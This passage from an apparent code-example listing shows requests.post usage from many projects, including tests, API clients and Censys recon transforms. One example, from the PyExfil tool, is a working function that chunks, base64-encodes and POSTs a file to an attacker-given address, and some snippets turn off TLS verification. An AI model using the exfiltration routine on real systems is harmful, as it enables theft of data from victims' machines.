            params['homepagetype2'] = 'Version Control'
        if result['bugs'] != '':
            params['homepage3'] = result['bugs']
            params['homepagetype3'] = 'Issue Tracker'
        if result['requiremax'] != '':
            params['depend2'] = result['requiremax']

        if result['ocsid'] == '':
            create_url = '%s/content/add' % url
            response = requests.post(create_url, params=params, auth=(user, password))
            code = self.get_status_code(response)

            if code == '102':
                raise Exception('Not authorized! Check your credentials.')

            # get ocsid
            tree = ElementTree.fromstring(response.text)
            ocsid = tree.findtext('.//data/content/id')

            print(('Please add <ocsid>%s</ocsid> to your appinfo/info.xml to '
                   'be able to update the uploaded app') % ocsid)
        else:
            update_url = '%s/content/edit/%s' % (url, result['ocsid'])
            response = requests.post(update_url, params=params, auth=(user, password))
            code = self.get_status_code(response)

            if code == '102':
                raise Exception('Not authorized! Check your credentials.')

        upload_file_url = '%s/content/uploaddownload/%s' % (url, result['ocsid'])
        file = {'localfile': open(archive_dir, 'rb')}
        response = requests.post(upload_file_url, files=file, auth=(user, password))
        code = self.get_status_code(response)

        if code == '101':
            raise Exception('Could not upload file. Is the archive bigger ' +
                            'than 10Mb?')
        elif code == '103':
            raise Exception('Not authorized! Check your credentials.')
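
Note that these appstore calls pass params=, which requests appends to the URL as a query string even on a POST; fields meant for the request body belong in data=. A short sketch (placeholder endpoint):

import requests

response = requests.post("https://apps.example.com/content/add",      # hypothetical endpoint
                         params={"name": "MyApp", "version": "1.0"},  # -> URL query string
                         data={"description": "uploaded via API"},    # -> form-encoded body
                         auth=("user", "password"))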

Example 11

Project: PyExfil Source File: http_exfiltration.py
Function: send_file
def send_file(addr, file_path, max_packet_size=1200, time_delay=0.05):
	"""
	This function will exfiltrate the data given.
	:param addr: IP or hostname to exfiltrate the data to
	:param file_path: Path of the file to exfiltrate
	:param max_packet_size: If not set the max size is 1200
	:param time_delay: If not set time delay between packets is 0.05 seconds
	:return:
	"""
	try:
		# Load file
		fh = open(file_path, READ_BINARY)
		iAmFile = fh.read()
		fh.close()
	except:
		sys.stderr.write("Error reading file!\n")
		raise

	# Split file to chunks by size:
	chunks = []
	IamDone = ""

	IamDone = base64.b64encode(iAmFile)                                                         # Base64 Encode for ASCII
	checksum = zlib.crc32(IamDone)                                                              # Calculate CRC32 for later verification
	chunks = [IamDone[i:i + max_packet_size] for i in range(0, len(IamDone), max_packet_size)]  # Split into chunks
	head, tail = os.path.split(file_path)                                                       # Get filename

	# Initial packet:
	try:
		init_payload = tail + COOKIE_DELIMITER + str(checksum) + COOKIE_DELIMITER + str(len(chunks))
		payload = {INIT_PACKET_COOKIE: init_payload}
		requests.post(addr, data=json.dumps(payload), headers=HEADERS)
		sys.stdout.write("[+] Sent initiation package. Total of %s chunks.\n" % (len(chunks) + 2))
		sys.stdout.write(".")
		time.sleep(time_delay)
	except:
		sys.stderr.write("Unable to reach target with error:\n")
		raise

	# Send data
	current_chunk = 0
	for chunk in chunks:
		payload = {PACKET_COOKIE + str(current_chunk): chunk}
		requests.post(addr, data=json.dumps(payload), headers=HEADERS)
		current_chunk += 1
		sys.stdout.write(".")
		time.sleep(time_delay)
	sys.stdout.write(".\n")

	# Termination packet
	data = DATA_END + str(current_chunk)
	payload = {TERMINATION_COOKIE: data}
	requests.post(addr, data=json.dumps(payload), headers=HEADERS)
	sys.stdout.write("[+] Sent termination packets and total of %s packets.\n" % current_chunk)

	return 0

Example 12

Project: home-assistant Source File: test_api.py
    def test_api_event_forward(self):
        """Test setting up event forwarding."""
        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({'host': '127.0.0.1'}),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({'api_password': 'bla-di-bla'}),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'api_password': 'bla-di-bla',
                'host': '127.0.0.1',
                'port': 'abcd'
                }),
            headers=HA_HEADERS)
        self.assertEqual(422, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'api_password': 'bla-di-bla',
                'host': '127.0.0.1',
                'port': get_test_instance_port()
                }),
            headers=HA_HEADERS)
        self.assertEqual(422, req.status_code)

        # Setup a real one
        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'api_password': API_PASSWORD,
                'host': '127.0.0.1',
                'port': SERVER_PORT
                }),
            headers=HA_HEADERS)
        self.assertEqual(200, req.status_code)

        # Delete it again..
        req = requests.delete(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({}),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.delete(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'host': '127.0.0.1',
                'port': 'abcd'
                }),
            headers=HA_HEADERS)
        self.assertEqual(422, req.status_code)

        req = requests.delete(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'host': '127.0.0.1',
                'port': SERVER_PORT
                }),
            headers=HA_HEADERS)
        self.assertEqual(200, req.status_code)

Example 13

Project: dd-agent Source File: test_transaction.py
    def testEndpoints(self):
        """
        Tests that the logic behind the agent version specific endpoints is ok.
        Also tests that these endpoints actually exist.
        """
        MetricTransaction._endpoints = []
        api_key = "a" * 32
        config = {
            "endpoints": {"https://app.datadoghq.com": [api_key]},
            "dd_url": "https://app.datadoghq.com",
            "api_key": api_key,
            "use_dd": True
        }

        app = Application()
        app.skip_ssl_validation = False
        app._agentConfig = config
        app.use_simple_http_client = True

        trManager = TransactionManager(timedelta(seconds=0), MAX_QUEUE_SIZE,
                                       THROTTLING_DELAY, max_endpoint_errors=100)
        trManager._flush_without_ioloop = True  # Use blocking API to emulate tornado ioloop
        MetricTransaction._trManager = trManager
        MetricTransaction.set_application(app)
        MetricTransaction.set_endpoints(config['endpoints'])

        transaction = MetricTransaction(None, {}, "")
        endpoints = []
        for endpoint in transaction._endpoints:
            for api_key in transaction._endpoints[endpoint]:
                endpoints.append(transaction.get_url(endpoint, api_key))
        expected = ['https://{0}-app.agent.datadoghq.com/intake/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Metric Transaction
        transaction = APIMetricTransaction(None, {})
        endpoints = []
        for endpoint in transaction._endpoints:
            for api_key in transaction._endpoints[endpoint]:
                endpoints.append(transaction.get_url(endpoint, api_key))
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/series/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Service Check Transaction
        APIServiceCheckTransaction._trManager = trManager
        APIServiceCheckTransaction.set_application(app)
        APIServiceCheckTransaction.set_endpoints(config['endpoints'])

        transaction = APIServiceCheckTransaction(None, {})
        endpoints = []
        for endpoint in transaction._endpoints:
            for api_key in transaction._endpoints[endpoint]:
                endpoints.append(transaction.get_url(endpoint, api_key))
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/check_run/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({'check': 'test', 'status': 0}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

Example 14

Project: HTTPretty Source File: test_requests.py
@httprettified
@within(five=microseconds)
def test_streaming_responses(now):
    """
    Mock a streaming HTTP response, like those returned by the Twitter streaming
    API.
    """
    from contextlib import contextmanager

    @contextmanager
    def in_time(time, message):
        """
        A context manager that uses signals to force a time limit in tests
        (unlike the `@within` decorator, which only complains afterward), or
        raise an AssertionError.
        """
        import signal

        def handler(signum, frame):
            raise AssertionError(message)
        signal.signal(signal.SIGALRM, handler)
        signal.setitimer(signal.ITIMER_REAL, time)
        yield
        signal.setitimer(signal.ITIMER_REAL, 0)

    #XXX this obviously isn't a fully functional twitter streaming client!
    twitter_response_lines = [
        b'{"text":"If \\"for the boobs\\" requests to follow me one more time I\'m calling the police. http://t.co/a0mDEAD8"}\r\n',
        b'\r\n',
        b'{"text":"RT @onedirection: Thanks for all your #FollowMe1D requests Directioners! We\u2019ll be following 10 people throughout the day starting NOW. G ..."}\r\n'
    ]

    TWITTER_STREAMING_URL = "https://stream.twitter.com/1/statuses/filter.json"

    HTTPretty.register_uri(HTTPretty.POST, TWITTER_STREAMING_URL,
                           body=(l for l in twitter_response_lines),
                           streaming=True)

    # taken from the requests docs
    # http://docs.python-requests.org/en/latest/user/advanced/#streaming-requests
    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                             auth=('username', 'password'), stream=True)

    #test iterating by line
    line_iter = response.iter_lines()
    with in_time(0.01, 'Iterating by line is taking forever!'):
        for i in xrange(len(twitter_response_lines)):
            expect(next(line_iter).strip()).to.equal(
                twitter_response_lines[i].strip())

    #test iterating by line after a second request
    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                            auth=('username', 'password'), stream=True)

    line_iter = response.iter_lines()
    with in_time(0.01, 'Iterating by line is taking forever the second time '
                       'around!'):
        for i in xrange(len(twitter_response_lines)):
            expect(next(line_iter).strip()).to.equal(
                twitter_response_lines[i].strip())

    #test iterating by char
    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                            auth=('username', 'password'), stream=True)

    twitter_expected_response_body = b''.join(twitter_response_lines)
    with in_time(0.02, 'Iterating by char is taking forever!'):
        twitter_body = b''.join(c for c in response.iter_content(chunk_size=1))

    expect(twitter_body).to.equal(twitter_expected_response_body)

    #test iterating by chunks larger than the stream

    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                             auth=('username', 'password'), stream=True)

    with in_time(0.02, 'Iterating by large chunks is taking forever!'):
        twitter_body = b''.join(c for c in
                                response.iter_content(chunk_size=1024))

    expect(twitter_body).to.equal(twitter_expected_response_body)
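
Outside of HTTPretty, the same pattern works against a live streaming endpoint: stream=True defers reading the body, and iter_lines() / iter_content() consume it incrementally. A sketch with placeholder URL and credentials:

import requests

response = requests.post("https://stream.example.com/1/statuses/filter.json",  # placeholder
                         data={"track": "requests"},
                         auth=("username", "password"), stream=True)
for line in response.iter_lines():
    if line:  # skip keep-alive blank lines
        print(line)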

Example 15

Project: spreads Source File: tasks.py
@task_queue.task()
def upload_workflow(wf_id, base_path, endpoint, user_config,
                    start_process=False, start_output=False):
    logger.debug("Uploading workflow to postprocessing server")

    workflow = Workflow.find_by_id(base_path, wf_id)
    # NOTE: This is kind of nasty.... We temporarily write the user-supplied
    # configuration to the bag, update the tag-payload, create the zip, and
    # once everything is done, we restore the old version
    tmp_cfg = copy.deepcopy(workflow.config)
    tmp_cfg.set(user_config)
    tmp_cfg_path = workflow.path/'config.yml'
    tmp_cfg.dump(filename=unicode(tmp_cfg_path),
                 sections=(user_config['plugins'] + ["plugins", "device"]))
    workflow.bag.add_tagfiles(unicode(tmp_cfg_path))

    # Create a zipstream from the workflow-bag
    zstream = workflow.bag.package_as_zipstream(compression=None)
    zsize = calculate_zipsize(zstream.paths_to_write)

    def zstream_wrapper():
        """ Wrapper around our zstream so we can emit a signal when all data
        has been streamed to the client.
        """
        transferred = 0
        progress = "0.00"
        for data in zstream:
            yield data
            transferred += len(data)
            # Only update progress if we've progress at least by 0.01
            new_progress = "{0:.2f}".format(transferred/zsize)
            if new_progress != progress:
                progress = new_progress
                signals['submit:progressed'].send(
                    workflow, progress=float(progress),
                    status="Uploading workflow...")

    # NOTE: This is neccessary since requests makes a chunked upload when
    #       passed a plain generator, which is not supported by the WSGI
    #       protocol that receives it. Hence we wrap it inside of a
    #       GeneratorIO to make it appear as a file-like object with a
    #       known size.
    zstream_fp = GeneratorIO(zstream_wrapper(), zsize)
    logger.debug("Projected size for upload: {}".format(zsize))
    signals['submit:started'].send(workflow)
    resp = requests.post(endpoint, data=zstream_fp,
                         headers={'Content-Type': 'application/zip'})
    if not resp:
        error_msg = "Upload failed: {0}".format(resp.content)
        signals['submit:error'].send(workflow, message=error_msg,
                                     data=resp.content)
        logger.error(error_msg)
    else:
        wfid = resp.json()['id']
        if start_process:
            requests.post(endpoint + "/{0}/process".format(wfid))
        if start_output:
            requests.post(endpoint + "/{0}/output".format(wfid))
        signals['submit:completed'].send(workflow, remote_id=wfid)

    # Restore our old configuration
    workflow._save_config()
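
The NOTE in the code is worth remembering: requests sends a chunked upload when data= is a bare generator, but a file-like object with a known size gets a plain Content-Length body. A minimal sketch of the same idea using an ordinary file instead of GeneratorIO (the path and URL are placeholders):

import requests

# a real file object exposes its size, so requests sets Content-Length
# rather than Transfer-Encoding: chunked
with open("workflow.zip", "rb") as fp:
    resp = requests.post("https://postproc.example/api/workflows",  # hypothetical endpoint
                         data=fp, headers={"Content-Type": "application/zip"})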

Example 16

Project: contrail-neutron-plugin Source File: contrail_plugin.py
    def _request_api_server(self, url, data=None, headers=None):
        # Attempt to post to Api-Server
        if self._apiinsecure:
             response = requests.post(url, data=data, headers=headers,verify=False)
        elif not self._apiinsecure and self._use_api_certs:
             response = requests.post(url, data=data, headers=headers,verify=self._apicertbundle)
        else:
             response = requests.post(url, data=data, headers=headers)
        if (response.status_code == requests.codes.unauthorized):
            # Get token from keystone and save it for next request
            if self._ksinsecure:
               response = requests.post(self._keystone_url,
                                        data=self._authn_body,
                                        headers={'Content-type': 'application/json'},verify=False)
            elif not self._ksinsecure and self._use_ks_certs:
               response = requests.post(self._keystone_url,
                                        data=self._authn_body,
                                        headers={'Content-type': 'application/json'},verify=self._kscertbundle)
            else:
               response = requests.post(self._keystone_url,
                                        data=self._authn_body,
                                        headers={'Content-type': 'application/json'})
            if (response.status_code == requests.codes.ok):
                # plan is to re-issue original request with new token
                auth_headers = headers or {}
                authn_content = json.loads(response.text)
                self._authn_token = authn_content['access']['token']['id']
                auth_headers['X-AUTH-TOKEN'] = self._authn_token
                response = self._request_api_server(url, data, auth_headers)
            else:
                raise RuntimeError('Authentication Failure')
        return response
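
Besides True and False, verify= also accepts a filesystem path to a CA bundle, which is what the _apicertbundle and _kscertbundle branches above rely on. A one-call sketch (URL and path are placeholders):

import json
import requests

response = requests.post("https://api-server.example:8082/virtual-networks",  # hypothetical URL
                         data=json.dumps({}),
                         headers={"Content-type": "application/json"},
                         verify="/etc/ssl/certs/internal-ca-bundle.pem")  # CA bundle path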

Example 17

Project: ANALYSE Source File: release.py
Function: create_github_creds
def create_github_creds():
    """
    https://developer.github.com/v3/oauth_authorizations/#create-a-new-authorization
    """
    headers = {"User-Agent": "edx-release"}
    payload = {"note": "edx-release"}
    username = raw_input("Github username: ")
    password = getpass.getpass("Github password: ")
    response = requests.post(
        "https://api.github.com/authorizations",
        auth=(username, password),
        headers=headers, data=json.dumps(payload),
    )
    # is the user using two-factor authentication?
    otp_header = response.headers.get("X-GitHub-OTP")
    if not response.ok and otp_header and otp_header.startswith("required;"):
        # get two-factor code, redo the request
        headers["X-GitHub-OTP"] = raw_input("Two-factor authentication code: ")
        response = requests.post(
            "https://api.github.com/authorizations",
            auth=(username, password),
            headers=headers, data=json.dumps(payload),
        )
    if not response.ok:
        message = response.json()["message"]
        if message != "Validation Failed":
            raise requests.exceptions.RequestException(message)
        else:
            # A token called "edx-release" already exists on Github.
            # Delete it, and try again.
            token_id = get_github_auth_id(username, password, "edx-release")
            if token_id:
                delete_github_auth_token(username, password, token_id)
            response = requests.post(
                "https://api.github.com/authorizations",
                auth=(username, password),
                headers=headers, data=json.dumps(payload),
            )
    if not response.ok:
        message = response.json()["message"]
        raise requests.exceptions.RequestException(message)

    return (username, response.json()["token"])
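
The two-factor handling reduces to inspecting one response header and retrying with one extra request header. A condensed sketch of that pattern (get_otp is a hypothetical prompt callable; GitHub has since deprecated this authorizations API, so treat the endpoint as illustrative):

import json
import requests

def post_with_otp(url, auth, payload, get_otp):
    headers = {'User-Agent': 'demo'}
    response = requests.post(url, auth=auth, headers=headers,
                             data=json.dumps(payload))
    otp = response.headers.get('X-GitHub-OTP', '')
    if not response.ok and otp.startswith('required;'):
        # The account uses two-factor auth: ask for the code and retry.
        headers['X-GitHub-OTP'] = get_otp()
        response = requests.post(url, auth=auth, headers=headers,
                                 data=json.dumps(payload))
    return response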

Example 18

Project: silo.pub Source File: tumblr.py
def publish(site):
    auth = OAuth1(
        client_key=current_app.config['TUMBLR_CLIENT_KEY'],
        client_secret=current_app.config['TUMBLR_CLIENT_SECRET'],
        resource_owner_key=site.account.token,
        resource_owner_secret=site.account.token_secret)

    create_post_url = CREATE_POST_URL.format(site.domain)
    photo_url = util.get_first(util.get_possible_array_value(request.form, 'photo'))
    photo_file = util.get_first(util.get_possible_array_value(request.files, 'photo'))

    if photo_url:
        data = util.trim_nulls({
            'type': 'photo',
            'slug': request.form.get('slug'),
            'caption': request.form.get('content[html]') or
            request.form.get('content') or request.form.get('name') or
            request.form.get('summary'),
            'source': photo_url
        })
        r = requests.post(create_post_url, data=data, auth=auth)

    elif photo_file:
        # tumblr signs multipart in a weird way. first sign the request as if
        # it's application/x-www-form-urlencoded, then recreate the request as
        # multipart but use the signed headers from before. Mostly cribbed from
        # https://github.com/tumblr/pytumblr/blob/\
        # 20e7e38ba6f0734335deee64d4cae45fa8a2ce90/pytumblr/request.py#L101

        # The API documentation and some of the code samples gave me the
        # impression that you could also send files just as part of the
        # form-encoded data, but I couldn't make it work
        # https://www.tumblr.com/docs/en/api/v2#pphoto-posts
        # https://gist.github.com/codingjester/1649885#file-upload-php-L56
        data = util.trim_nulls({
            'type': 'photo',
            'slug': request.form.get('slug'),
            'caption': request.form.get('content[html]') or
            request.form.get('content') or request.form.get('name') or
            request.form.get('summary'),
        })
        fake_req = requests.Request('POST', create_post_url, data=data)
        fake_req = fake_req.prepare()
        auth(fake_req)

        real_headers = dict(fake_req.headers)

        # manually strip these, requests will recalculate them for us
        del real_headers['Content-Type']
        del real_headers['Content-Length']

        current_app.logger.info(
            'uploading photo to tumblr %s, headers=%r',
            create_post_url, real_headers)
        r = requests.post(create_post_url, data=data, files={
            'data': photo_file,
        }, headers=real_headers)

    else:
        data = util.trim_nulls({
            # one of: text, photo, quote, link, chat, audio, video
            'type': 'text',
            'slug': request.form.get('slug'),
            'title': request.form.get('name'),
            'body': util.get_complex_content(request.form),
        })
        current_app.logger.info(
            'posting to tumblr %s, data=%r', create_post_url, data)
        r = requests.post(create_post_url, data=data, auth=auth)

    current_app.logger.info(
        'response from tumblr %r, data=%r, headers=%r',
        r, r.content, r.headers)

    if r.status_code // 100 != 2:
        current_app.logger.warn(
            'Tumblr publish failed with response %s', r.text)
        return util.wrap_silo_error_response(r)

    location = None
    if 'Location' in r.headers:
        location = r.headers['Location']
    else:
        # only get back the id, look up the url
        post_id = r.json().get('response').get('id')
        r = requests.get(FETCH_POST_URL.format(site.domain), params={
            'api_key': current_app.config['TUMBLR_CLIENT_KEY'],
            'id': post_id,
        })
        if r.status_code // 100 == 2:
            posts = r.json().get('response', {}).get('posts', [])
            if posts:
                location = posts[0].get('post_url')

    return util.make_publish_success_response(location)
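
Stripped to its essentials, the multipart trick is: prepare a form-encoded request, let the OAuth1 auth object sign it, then replay those signed headers on the real multipart request. A minimal sketch with placeholder credentials, URL, and file name:

import requests
from requests_oauthlib import OAuth1

auth = OAuth1('client_key', 'client_secret', 'token', 'token_secret')
data = {'type': 'photo', 'caption': 'hello'}
url = 'https://api.example.com/post'

# Sign as if the body were application/x-www-form-urlencoded.
fake = requests.Request('POST', url, data=data).prepare()
auth(fake)
headers = dict(fake.headers)

# requests recomputes these for the multipart body.
headers.pop('Content-Type', None)
headers.pop('Content-Length', None)

with open('photo.jpg', 'rb') as f:
    r = requests.post(url, data=data, files={'data': f}, headers=headers)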

Example 19

Project: manila Source File: jsonrpc.py
    @utils.synchronized('quobyte-request')
    def call(self, method_name, user_parameters):
        # prepare request
        self._id += 1
        parameters = {'retry': 'INFINITELY'}  # Backend specific setting
        if user_parameters:
            parameters.update(user_parameters)
        post_data = {
            'jsonrpc': '2.0',
            'method': method_name,
            'params': parameters,
            'id': six.text_type(self._id),
        }
        LOG.debug("Request payload to be sent is: %s",
                  jsonutils.dumps(post_data))

        # send request
        if self._url_scheme == 'https':
            if self._cert_file:
                result = requests.post(url=self._url,
                                       json=post_data,
                                       auth=self._credentials,
                                       verify=self._ca_file,
                                       cert=(self._cert_file, self._key_file))
            else:
                result = requests.post(url=self._url,
                                       json=post_data,
                                       auth=self._credentials,
                                       verify=self._ca_file)
        else:
            result = requests.post(url=self._url,
                                   json=post_data,
                                   auth=self._credentials)

        # eval request response
        if result.status_code == codes['OK']:
            LOG.debug("Retrieved data from Quobyte backend: %s", result.text)
            response = result.json()
            return self._checked_for_application_error(response)

        # If things did not work out provide error info
        LOG.debug("Backend request resulted in error: %s" % result.text)
        result.raise_for_status()
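
The three branches differ only in their TLS keyword arguments; the JSON-RPC handling itself leans on one requests feature: json= serializes the payload and sets the Content-Type header in one step, equivalent to data=jsonutils.dumps(post_data) plus an explicit header. A minimal sketch (URL, credentials, and CA path are placeholders):

import requests

payload = {'jsonrpc': '2.0', 'method': 'ping', 'params': {}, 'id': '1'}

# json= handles serialization and the application/json Content-Type.
result = requests.post('https://backend.example/api', json=payload,
                       auth=('user', 'secret'), verify='/path/to/ca.pem')
result.raise_for_status()
print(result.json())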

Example 20

Project: maltego_censys Source File: censys_ip_to_cert.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    ip = sys.argv[3]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': 'ip: {ip}'.format(ip=ip), 'fields': ['443.https.tls.certificate.parsed.fingerprint_sha1',
                                                           '443.https.tls.certificate.parsed.issuer_dn',
                                                           '443.https.tls.certificate.parsed.subject_dn',
                                                           'updated_at'], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                parse_results(results['results'], mt)
                if pages > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if 1 < pages < 5:
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
            else:
                mt.addUIMessage("No SSL certs were found on this ip: {ip}".format(ip=ip))
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No SSL certs were found on this ip: {ip}".format(ip=ip))
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()

    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()
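
The pagination above repeats the same request/parse block for each branch. A compact equivalent, assuming the same Censys search endpoint and omitting the per-status error handling:

import json
import requests

def search_all(query, auth, max_pages=4):
    # Censys returns 25 results per page, so 4 pages covers the first 100.
    url = 'https://www.censys.io/api/v1/search/ipv4'
    results = []
    page = 1
    while page <= max_pages:
        query['page'] = page
        resp = requests.post(url, data=json.dumps(query), auth=auth)
        resp.raise_for_status()
        body = resp.json()
        results.extend(body['results'])
        if page >= body['metadata']['pages']:
            break
        page += 1
    return results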

Example 21

Project: maltego_censys Source File: censys_cert_to_ip.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    sha1 = sys.argv[3]
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': '443.https.tls.certificate.parsed.fingerprint_sha1: {s}'.format(s=sha1),
             'fields': ['ip', '443.https.tls.certificate.parsed.subject.common_name.raw',
                        '443.https.tls.certificate.parsed.issuer.common_name.raw', 'updated_at'], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                process_results(results['results'], mt)
                if pages > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                process_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if 1 < pages < 5:
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                process_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
            else:
                mt.addUIMessage("No IP addresses found with this ssl cert")
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No info found")
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()
    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 22

Project: SickRage Source File: requests_transport.py
    def request(self, host, handler, request_body, verbose=0):
        """Replace the xmlrpc request function.

        Process xmlrpc request via requests library.

        Args:
            host: Target host
            handler: Target PRC handler.
            request_body: XML-RPC request body.
            verbose: Debugging flag.

        Returns:
            Parsed response.

        Raises:
            RequestException: Error in requests
        """
        if verbose:
            self._debug()

        if not self._check_ssl_cert:
            disable_warnings()

        headers = {'User-Agent': self.user_agent, 'Content-Type': 'text/xml', }

        # Need to be done because the schema(http or https) is lost in
        # xmlrpc.Transport's init.
        if self._use_https:
            url = "https://{host}/{handler}".format(host=host, handler=handler)
        else:
            url = "http://{host}/{handler}".format(host=host, handler=handler)

        # TODO Construct kwargs query instead
        try:
            if self._authtype == "basic":
                response = requests.post(
                    url,
                    data=request_body,
                    headers=headers,
                    verify=self._check_ssl_cert,
                    auth=HTTPBasicAuth(
                        self._username, self._password),
                    proxies=self._proxies)
            elif self._authtype == "digest":
                response = requests.post(
                    url,
                    data=request_body,
                    headers=headers,
                    verify=self._check_ssl_cert,
                    auth=HTTPDigestAuth(
                        self._username, self._password),
                    proxies=self._proxies)
            else:
                response = requests.post(
                    url,
                    data=request_body,
                    headers=headers,
                    verify=self._check_ssl_cert,
                    proxies=self._proxies)

            response.raise_for_status()
        except RequestException as error:
            raise xmlrpc_client.ProtocolError(url,
                                              error.message,
                                              traceback.format_exc(),
                                              response.headers)

        return self.parse_response(response)
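
The TODO in this transport hints at building a single kwargs dict instead of repeating the requests.post call per auth type. One way that could look (a sketch, not the project's actual code):

import requests
from requests.auth import HTTPBasicAuth, HTTPDigestAuth

def post_xmlrpc(url, body, authtype=None, username=None, password=None,
                verify=True, proxies=None):
    kwargs = {
        'data': body,
        'headers': {'Content-Type': 'text/xml'},
        'verify': verify,
        'proxies': proxies,
    }
    # Only the auth object varies between the three branches above.
    if authtype == 'basic':
        kwargs['auth'] = HTTPBasicAuth(username, password)
    elif authtype == 'digest':
        kwargs['auth'] = HTTPDigestAuth(username, password)
    response = requests.post(url, **kwargs)
    response.raise_for_status()
    return response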

Example 23

Project: mining Source File: build_admin.py
def build(level=0):
    demo_path = os.path.abspath(os.path.dirname(__file__))
    try:
        os.remove(os.path.join(demo_path, 'demo.db'))
    except OSError:
        pass
    conn = sqlite3.connect('{}'.format(os.path.join(demo_path, 'demo.db')))
    cur = conn.cursor()
